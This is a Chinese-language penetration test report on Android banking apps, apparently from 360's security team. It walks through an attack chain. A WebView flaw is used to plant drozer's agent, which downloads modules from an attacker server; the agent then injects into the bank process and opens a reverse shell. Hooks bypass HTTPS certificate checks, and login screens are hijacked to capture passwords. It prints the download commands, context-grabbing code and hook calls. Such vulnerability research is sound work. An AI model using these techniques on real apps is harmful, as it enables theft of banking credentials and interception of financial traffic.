web scan360cn.html,360捉虫猎手银行APP安全性渗透测试报告

360捉虫猎手银行APP安全性渗透测试报告

2014-12-29 14:00:28

阅读：0次

作者:@flankerskyhttp://weibo.com/u/2785474842

转载请说明出处: http://appscan.360.cn

前段时间调研了各大银行的android版客户端，发现绝大多数客户端都存高危漏洞，并验证了漏洞的危害性，在无root权限的条件下实现了对银行客户端进行远程控制，获取账号密码等重要信息。

一、利用webview漏洞远程植入木马

下面这张图是某银行的“基金咨询”页面存在的webview漏洞：

通过该漏洞给银行APP植入drozer的native agent - weasel，weasel的Hexvalue大概为150k，没有做分割可以直接写入。

利用weasel可以去下载所需的其它攻击模块：

runtime.exec(['/system/bin/sh','-c',weaselPath+''+serverip+' 80 get inject']).waitFor();

runtime.exec(['/system/bin/sh','-c',weaselPath +' '+serverip+' 80 get libhello.so']).waitFor();

runtime.exec(['/system/bin/sh','-c',weaselPath +' '+serverip+' 80 get agent.jar']).waitFor();

runtime.exec(['/system/bin/sh','-c',weaselPath +' '+serverip+' 80 get drozer.config']).waitFor();

runtime.exec(['/system/bin/sh','-c',weaselPath +' '+serverip+' 80 get libsslkiller.so']).waitFor();

runtime.exec(['/system/bin/sh','-c',weaselPath +' '+serverip+' 80 get sslkiller.dex']).waitFor();

由于需要方便测试整体安全性，我的测试环境设置了app debug权限，允许父子进程互相注入而不需要root权限。

可以直接使用inject模块进行ptrace注入进行攻击模块的测试：runtime.exec(['/system/bin/sh','-c',injectpath+''+pid.toString()+' '+injectlibpath]).waitFor();

二、获取进程的applicationcontext，进行远程控制

注入成功之后要做的就是获取到application context，然后做反向连接，拿到shell。

Android中的context可以做很多操作，比如加载访问资源等，拥有了app的application context就相当于继承了这个app的所有的权限。但获取application context也是件麻烦的事情，方法是在native层先获取到system context，然后利用createPackageContext再获取到app的application context。

但是代码中也存在两个问题：

第一个问题，POC是假定用System.load来加载该native代码，所以入口处传入了一个虚拟机的实例，但是在注入的情况下是没法获取到虚拟机的实例的，也就没法获取JNIEnv来进行反射调用；

利用 android::AndroidRuntime::getJavaVM();可以获取到一个虚拟机实例。

第二个问题是后来在进行activity钓鱼时发现的一个bug，看一下mwr是怎么获取到system context的，代码如下：

theClass =(*env)->FindClass(env,"android/app/ActivityThread");

method=(*env)->GetStaticMethodID(env,theClass,"systemMain","()Landroid/app/ActivityThread;");

activityThread = (*env)->CallStaticObjectMethod(env,theClass,method);

theClass =(*env)->FindClass(env,"android/app/ContextImpl");

method=(*env)->GetStaticMethodID(env,theClass,"createSystemContext","(Landroid/app/ActivityThread;)Landroid/app/ContextImpl;");

context = (*env)->CallStaticObjectMethod(env,theClass,method,activityThread);

其中有问题的是获取activityThread的过程，调用的是systemMain方法，查一下systemMain源码：public staticActivityThreadsystemMain() {

HardwareRenderer.disable(true);

ActivityThreadthread = new ActivityThread();

thread.attach(true);

returnthread;

}

代码除了创建一个ActivityThread实例外，还做了一个attach操作，这个操作是否破坏了原先的ActivityThread或者影响了对当前activity的调度等，由于时间仓促，所以没有继续深究。但是如果这样调用，注入成功后进行activity切换的时候会出现crash的情况。所以，试着换了个写法：theClass =env->FindClass("android/app/ActivityThread");

method =env->GetMethodID(theClass, "", "()V");

activityThread =env->NewObject( (jclass)theClass, method);

直接这样生成ActivityThread实例，并不会对后面调用createSystemContext产生影响。

在native层获取到system context后，利用system context调用ClassLoader加载agent.jar,agent.jar是drozer的一个子项目， 加载agent.jar时将system context传入，在java层调用createPackageContext如下：public Agent(String host, intport ,String package_name, Context context) {

if(context != null) {

try{

Agent.context= context.createPackageContext(package_name,Context.CONTEXT_IGNORE_SECURITY);

}catch (NameNotFoundException e) {

//TODO Auto-generated catch block

e.printStackTrace();

}

}

Stringlibpath ="/data/data/"+package_name+"/files/libsslkiller.so";

System.load(libpath);

this.device_info= new DeviceInfo(

this.getUID(),

android.os.Build.MANUFACTURER,

android.os.Build.MODEL,

android.os.Build.VERSION.RELEASE);

this.endpoint= new Endpoint(

1,

"drozerServer",

host,

port,

false,

"",

"",

"",

true);

}

接着会根据host port参数去连接drozer server，实现drozer shell的反弹。在drozer shell中运行permissions就可看是否获取到了所注入进程的权限，效果如下：

三、通过hook绕过对https证书的验证，截获https通信内容

获取到drozer的shell之后，就可以利用drozer的框架，编写模块来进行一些操作，比如hook证书验证的一些函数，截获https通信内容。

hook证书校验的函数参考了Android-SSL-TrustKiller项目https://github.com/iSECPartners/Android-SSL-TrustKiller

该项目是在substrate框架上的hook模块，通过hook几个函数绕过客户端对https证书的验证，相当于信任所有证书，从而通过中间人攻击可以截获https通信内容。

但该项目是基于substrate的，substrate是不开源的，所以在ddi的框架上对其进行了重新实现。

主要的代码如下：dalvik_hook_setup(&sb1,"Ljavax/net/ssl/TrustManagerFactory;",  "getTrustManagers",  "()[Ljavax/net/ssl/TrustManager;",1, sb1_getTrustManagers);

dalvik_hook(&d,&sb1);

dalvik_hook_setup(&sb2,"Ljavax/net/ssl/HttpsURLConnection;",  "setSSLSocketFactory",  "(Ljavax/net/ssl/SSLSocketFactory;)V",2, sb2_setSSLSocketFactory);

dalvik_hook(&d,&sb2);

dalvik_hook_setup(&sb3,"Ljavax/net/ssl/SSLContext;",  "init",  "([Ljavax/net/ssl/KeyManager;[Ljavax/net/ssl/TrustManager;Ljava/security/SecureRandom;)V",4, sb3_SSLContextinit);

dalvik_hook(&d,&sb3);

dalvik_hook_setup(&sb4,"Lorg/apache/http/conn/ssl/SSLSocketFactory;",  "setHostnameVerifier",  "(Lorg/apache/http/conn/ssl/X509HostnameVerifier;)V",2, sb4_setHostnameVerifier);

dalvik_hook(&d,&sb4);

dalvik_hook_setup(&sb5,"Lorg/apache/http/conn/ssl/SSLSocketFactory;",  "isSecure",  "(Ljava/net/Socket;)Z",2, sb5_isSecure);

dalvik_hook(&d,&sb5);

dalvik_hook_setup(&sb6,"Ljavax/net/ssl/HttpsURLConnection;",  "setDefaultHostnameVerifier",  "(Ljavax/net/ssl/HostnameVerifier;)V",2, sb6_setDefaultHostnameVerifier);

dalvik_hook(&d,&sb6);

但是还有一个问题，上述hook时需要加载一个java类，所以需要用到动态加载dex的函数，ddi本身提供了一些列函数，如dexstuff_loaddex等，但是正如其文档中描述的需要执行命令chmod 777 /data/dalvik-cache/，因为需要往该目录写入缓存，但是普通权限是无法执行上述操作的；所以，不能直接用ddi的dex解析函数，需要用反射调用java代码的方式来加载dex。最终截获https的通信内容如下：

四、activity钓鱼

activity劫持常见的做法是，在后台实时监测前台窗口的运行，如果发现前台是一个银行的登录界面，就启动仿冒的activity来覆盖正常的activity。具体的实施方法主要有两种：

一是监控logcat中ActivityManagerService中打印的activity切换时的log信息，但在较新的系统上，应用程序不再有监控logcat的权限，所以这种方法部分失效了；

另一种方法就是申请android.permission.GET_TASKS权限，可以获取前台界面名称。但既然已经注入到了当前进程，所以采用了hook的方法来进行activity的劫持，方法是通过反射替换了ActivityThread中的对象mInstrumentation，在自实现的Instrumentation对象中，hook activity的OnResume方法，在activity中查找到EditText,Button等，保存其旧的回调函数，修改其回调函数，劫持用户输入的密码。

编写drozer的模块，加载本地的apk文件到设备端进行hook，最终activity劫持的演示效果如下图：